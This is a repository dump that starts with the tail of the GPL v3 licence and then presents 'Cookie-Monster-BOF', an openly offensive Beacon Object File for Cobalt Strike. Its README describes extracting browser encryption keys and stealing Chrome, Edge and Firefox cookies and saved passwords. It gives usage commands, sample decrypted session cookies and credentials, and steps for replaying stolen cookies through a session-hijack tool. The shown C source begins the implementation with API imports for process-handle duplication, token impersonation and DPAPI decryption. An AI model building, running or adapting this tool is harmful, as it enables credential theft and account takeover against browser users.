the User Product in which it has been modified or installed.  Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.

  Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.

  7. Additional Terms.

  "Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law.  If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.

  When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it.  (Additional permissions may be written to require their own
removal in certain cases when you modify the work.)  You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.

  Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:

    a) Disclaiming warranty or limiting liability differently from the
    terms of sections 15 and 16 of this License; or

    b) Requiring preservation of specified reasonable legal notices or
    author attributions in that material or in the Appropriate Legal
    Notices displayed by works containing it; or

    c) Prohibiting misrepresentation of the origin of that material, or
    requiring that modified versions of such material be marked in
    reasonable ways as different from the original version; or

    d) Limiting the use for publicity purposes of names of licensors or
    authors of the material; or

    e) Declining to grant rights under trademark law for use of some
    trade names, trademarks, or service marks; or

    f) Requiring indemnification of licensors and authors of that
    material by anyone who conveys the material (or modified versions of
    it) with contractual assumptions of liability to the recipient, for
    any liability that these contractual assumptions directly impose on
    those licensors and authors.

  All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10.  If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term.  If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.

  If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.

  Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.

  8. Termination.

  You may not propagate or modify a covered work except as expressly
provided under this License.  Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).

  However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.

  Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.

  Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License.  If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.

  9. Acceptance Not Required for Having Copies.

  You are not required to accept this License in order to receive or
run a copy of the Program.  Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance.  However,
nothing other than this License grants you permission to propagate or
modify any covered work.  These actions infringe copyright if you do
not accept this License.  Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.

  10. Automatic Licensing of Downstream Recipients.

  Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License.  You are not responsible
for enforcing compliance by third parties with this License.

  An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations.  If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.

  You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License.  For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.

  11. Patents.

  A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based.  The
work thus licensed is called the contributor's "contributor version".

  A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version.  For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.

  Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.

  In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement).  To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.

  If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients.  "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.

  If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.

  A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License.  You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.

  Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.

  12. No Surrender of Others' Freedom.

  If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License.  If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all.  For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.

  13. Use with the GNU Affero General Public License.

  Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work.  The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.

  14. Revised Versions of this License.

  The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.

  Each version is given a distinguishing version number.  If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation.  If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.

  If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.

  Later license versions may give you additional or different
permissions.  However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.

  15. Disclaimer of Warranty.

  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

  16. Limitation of Liability.

  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.

  17. Interpretation of Sections 15 and 16.

  If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.

                     END OF TERMS AND CONDITIONS

            How to Apply These Terms to Your New Programs

  If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.

  To do so, attach the following notices to the program.  It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.

    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.

Also add information on how to contact you by electronic and paper mail.

  If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:

    <program>  Copyright (C) <year>  <name of author>
    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License.  Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".

  You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.

  The GNU General Public License does not permit incorporating your program
into proprietary programs.  If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library.  If this is what you want to do, use the GNU Lesser General
Public License instead of this License.  But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.


================================================
FILE: Creds-BOF/cookie-monster/Makefile
================================================
all:
	x86_64-w64-mingw32-gcc -DBOF -c cookie-monster-bof.c -o cookie-monster-bof.x64.o -Wdiscarded-qualifiers -Wincompatible-pointer-types
	x86_64-w64-mingw32-strip --strip-unneeded cookie-monster-bof.x64.o
	i686-w64-mingw32-gcc -DBOF -Wdiscarded-qualifiers -Wincompatible-pointer-types -c cookie-monster-bof.c -o cookie-monster-bof.x86.o
clean:
	rm cookie-monster.x64.o
	rm cookie-monster.x86.o


================================================
FILE: Creds-BOF/cookie-monster/README.md
================================================
# Cookie-Monster-BOF
Steal browser cookies for edge, chrome and firefox through a BOF!

Cookie Monster BOF will extract the WebKit Master Key and the App Bound Encryption Key for both Edge and Chrome, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target file(s).

Once the Cookies/Login Data file(s) are downloaded, the python decryption script can be used to extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.  

Chrome & Edge 127+ Updates: new chromium browser cookies (v20) use the app bound key to encrypt the cookies. As a result, this makes retrieving the app_bound_encrypted_key slightly more difficult. Thanks to [snovvcrash](https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824) this process can be accomplished without having to escalate your privileges. The catch is your process must be running out of the web browser's application directory. i.e. must inject into Chrome/Edge or spawn a beacon from the same application directory as the browser. 

Latest update allows you to decrypt cookies as SYSTEM and without having to inject into the browser process! Shoutout to @sdemius for the discovering how to decrypt the Chrome's [PostProcessData](https://source.chromium.org/chromium/chromium/src/+/main:chrome/elevation_service/elevator.cc;l=216;bpv=1) function and @b1scoito [explanation](https://github.com/moonD4rk/HackBrowserData/issues/431#issuecomment-2606665195)! Chrome 137+ changed the PostProcessData() function once again, shoutout to [@runassu](https://github.com/runassu/chrome_v20_decryption) for figuring it out! 
 
## BOF Usage
```
Usage: cookie-monster [--chrome || --edge || --system <Local State File Path> <PID> || --firefox || --chromeCookiePID <PID> || --chromeLoginDataPID <PID> || --edgeCookiePID <PID> || --edgeLoginDataPID <PID> ] [--cookie-only] [--key-only] [--login-data-only] [--copy-file "C:\Folder\Location\"] 
cookie-monster Examples: 
   cookie-monster --chrome 
   cookie-monster --edge
   cookie-monster --system "C:\Users\<USER>\AppData\Local\<BROWSER>\User Data\Local State" <PID>
   cookie-moster --firefox 
   cookie-monster --chromeCookiePID <PID>
   cookie-monster --chromeLoginDataPID <PID> 
   cookie-monster --edgeCookiePID <PID> 
   cookie-monster --edgeLoginDataPID <PID> 
cookie-monster Options: 
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to cookies and then copies the file to the CWD 
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to cookies and then copies the file to the CWD 
    --system, Decrypt chromium based browser app bound encryption key without injecting into browser. Requires path to Local State file and PID of a user process for impersonation 
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file 
    --chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file 
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file   
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file 
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file  
    --key-only, only retrieve the app bound encryption key. Do not attempt to download the Cookie or Login Data files. 
    --cookie-only, only retrieve the Cookie file. Do not attempt to download Login Data file or retrieve app bound encryption key. 
    --login-data-only, only retrieve the Login Data file. Do not attempt to download Cookie file or retrieve app bound encryption key.  
    --copy-file, copies the Cookie and Login Data file to the folder specified. Does not use fileless retrieval method.   
```
## Compile BOF 
Ensure Mingw-w64 and make is installed on the linux prior to compiling.
```
make
```

## Decryption Steps
Install requirements
```
pip3 install -r requirements.txt
```

Usage
```
python3 decrypt.py -h                                                                                                                                                                      
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]

Decrypt Chromium cookies and passwords given a key and DB file

options:
  -h, --help            show this help message and exit
  -k KEY, --key KEY     Decryption key
  -o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
                        Option to choose
  -f FILE, --file FILE  Location of the database file
  --chrome-aes-key CHROME_AES_KEY
                        Chrome AES Key
```

Examples:
Decrypt Chrome/Edge Cookies File
```
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
```
Decrypt Chrome Cookies with Chrome AES Key
```
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json
```
Decrypt Chrome/Edge Cookies File and save to json
```
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json
```
Import cookies JSON file with https://cookie-editor.com/ 

Decrypt Chome/Edge Passwords File
```
python .\decrypt.py -k "\xec\xfc...." -o passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
```
Decrypt Firefox Cookies and Stored Credentials: <br>
https://github.com/lclevy/firepwd

### CuddlePhish Support
added cuddlephish option to the decrypt script which should support using the cookie with https://github.com/fkasler/cuddlephish

```
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db

# Clone Project
cd 
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish

# Install Dependencies Example on Debian 
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install

# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json
```

## References
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos!
Highly recommend checking out his lessons!!! <br>
Cookie Webkit Master Key Extractor:
https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF <br>
Fileless download:
https://github.com/fortra/nanodump <br>
Decrypt Cookies and Login Data:
https://github.com/login-securite/DonPAPI <br>
App Bound Key Decryption:
https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824 <br>
Decrypt Chrome 137+ Cookies
https://github.com/runassu/chrome_v20_decryption


================================================
FILE: Creds-BOF/cookie-monster/adaptix.h
================================================
#pragma once

#include "beacon.h"

DECLSPEC_IMPORT void AxAddScreenshot(char* note, char* data, int len);
DECLSPEC_IMPORT void AxDownloadMemory(char* filename, char* data, int len);


================================================
FILE: Creds-BOF/cookie-monster/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 *    7/18/2023: Added BeaconInformation API for 4.9
 *    7/31/2023: Added Key/Value store APIs for 4.9
 *                  BeaconAddValue, BeaconGetValue, and BeaconRemoveValue
 *    8/31/2023: Added Data store APIs for 4.9
 *                  BeaconDataStoreGetItem, BeaconDataStoreProtectItem,
 *                  BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries
 *    9/01/2023: Added BeaconGetCustomUserData API for 4.9
 */

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d

DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

/* Beacon Information */
/*
 *  ptr  - pointer to the base address of the allocated memory.
 *  size - the number of bytes allocated for the ptr.
 */
typedef struct {
	char * ptr;
	size_t size;
} HEAP_RECORD;
#define MASK_SIZE 13

/*
 *  sleep_mask_ptr        - pointer to the sleep mask base address
 *  sleep_mask_text_size  - the sleep mask text section size
 *  sleep_mask_total_size - the sleep mask total memory size
 *
 *  beacon_ptr   - pointer to beacon's base address
 *                 The stage.obfuscate flag affects this value when using CS default loader.
 *                    true:  beacon_ptr = allocated_buffer - 0x1000 (Not a valid address)
 *                    false: beacon_ptr = allocated_buffer (A valid address)
 *                 For a UDRL the beacon_ptr will be set to the 1st argument to DllMain
 *                 when the 2nd argument is set to DLL_PROCESS_ATTACH.
 *  sections     - list of memory sections beacon wants to mask. These are offset values
 *                 from the beacon_ptr and the start value is aligned on 0x1000 boundary.
 *                 A section is denoted by a pair indicating the start and end offset values.
 *                 The list is terminated by the start and end offset values of 0 and 0.
 *  heap_records - list of memory addresses on the heap beacon wants to mask.
 *                 The list is terminated by the HEAP_RECORD.ptr set to NULL.
 *  mask         - the mask that beacon randomly generated to apply
 */
typedef struct {
	char  * sleep_mask_ptr;
	DWORD   sleep_mask_text_size;
	DWORD   sleep_mask_total_size;

	char  * beacon_ptr;
	DWORD * sections;
	HEAP_RECORD * heap_records;
	char    mask[MASK_SIZE];
} BEACON_INFO;

DECLSPEC_IMPORT void   BeaconInformation(BEACON_INFO * info);

/* Key/Value store functions
 *    These functions are used to associate a key to a memory address and save
 *    that information into beacon.  These memory addresses can then be
 *    retrieved in a subsequent execution of a BOF.
 *
 *    key - the key will be converted to a hash which is used to locate the
 *          memory address.
 *
 *    ptr - a memory address to save.
 *
 * Considerations:
 *    - The contents at the memory address is not masked by beacon.
 *    - The contents at the memory address is not released by beacon.
 *
 */
DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr);
DECLSPEC_IMPORT void * BeaconGetValue(const char * key);
DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key);

/* Beacon Data Store functions
 *    These functions are used to access items in Beacon's Data Store.
 *    BeaconDataStoreGetItem returns NULL if the index does not exist.
 *
 *    The contents are masked by default, and BOFs must unprotect the entry
 *    before accessing the data buffer. BOFs must also protect the entry
 *    after the data is not used anymore.
 *
 */

#define DATA_STORE_TYPE_EMPTY 0
#define DATA_STORE_TYPE_GENERAL_FILE 1

typedef struct {
	int type;
	DWORD64 hash;
	BOOL masked;
	char* buffer;
	size_t length;
} DATA_STORE_OBJECT, *PDATA_STORE_OBJECT;

DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index);
DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries();

/* Beacon User Data functions */
DECLSPEC_IMPORT char * BeaconGetCustomUserData();

================================================
FILE: Creds-BOF/cookie-monster/cookie-monster-bof.c
================================================
#include <windows.h>
#include <stdint.h> 
#include <ctype.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "cookie-monster-bof.h"
#include "adaptix.h"

// Function declarations
BOOL download_file(IN LPCSTR fileName, IN char fileData[], IN ULONG32 fileLength);
BOOL GetBrowserFile(DWORD PID, CHAR *browserFile, CHAR *downloadFileName, CHAR * folderPath);

WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI HANDLE  WINAPI KERNEL32$CreateFileA (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
WINBASEAPI BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
WINBASEAPI DWORD   WINAPI KERNEL32$GetFileSize (HANDLE hFile, LPDWORD lpFileSizeHigh);
WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalAlloc (UINT uFlags, SIZE_T dwBytes);
WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalReAlloc (HGLOBAL hMem, SIZE_T dwBytes, UINT uFlags);
WINBASEAPI BOOL WINAPI    KERNEL32$ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
WINBASEAPI BOOL WINAPI    KERNEL32$CloseHandle (HANDLE hObject);
WINBASEAPI char* __cdecl  MSVCRT$strstr (char* _String, const char* _SubString);
WINBASEAPI size_t __cdecl MSVCRT$strlen (const char *s);
DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strchr(const char *haystack, int needle);
WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...);
WINBASEAPI int __cdecl MSVCRT$_snprintf(char * __restrict__ _Dest,size_t _Count,const char * __restrict__ _Format,...);
WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);

WINADVAPI WINBOOL WINAPI ADVAPI32$RevertToSelf();
WINBASEAPI HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL hMem);
WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
WINADVAPI WINBOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE,DWORD,LPSECURITY_ATTRIBUTES,SECURITY_IMPERSONATION_LEVEL,TOKEN_TYPE,PHANDLE);
WINADVAPI WINBOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE);
WINBASEAPI LPSTR WINAPI SHLWAPI$StrStrIA(LPCSTR lpFirst,LPCSTR lpSrch);

WINBASEAPI int __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size);
WINBASEAPI char* __cdecl  MSVCRT$strncpy (char * __dst, const char * __src, size_t __n);
WINBASEAPI char* __cdecl  MSVCRT$strncat (char * _Dest,const char * _Source, size_t __n);
DECLSPEC_IMPORT int WINAPI MSVCRT$strcmp(const char*, const char*);
WINBASEAPI BOOL  WINAPI   CRYPT32$CryptUnprotectData (DATA_BLOB *pDataIn, LPWSTR *ppszDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcsncpy(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source, size_t _Count);
WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1, const wchar_t *_Str2);
WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree (HGLOBAL hMem);
WINBASEAPI HANDLE WINAPI  KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID);
WINBASEAPI BOOL WINAPI    KERNEL32$Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
WINBASEAPI BOOL WINAPI    KERNEL32$Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
// WINBASEAPI HANDLE WINAPI  KERNEL32$GetCurrentProcess (VOID);
WINBASEAPI DWORD WINAPI KERNEL32$GetFileType(HANDLE hFile);
WINBASEAPI BOOL WINAPI    KERNEL32$DuplicateHandle (HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwOptions);
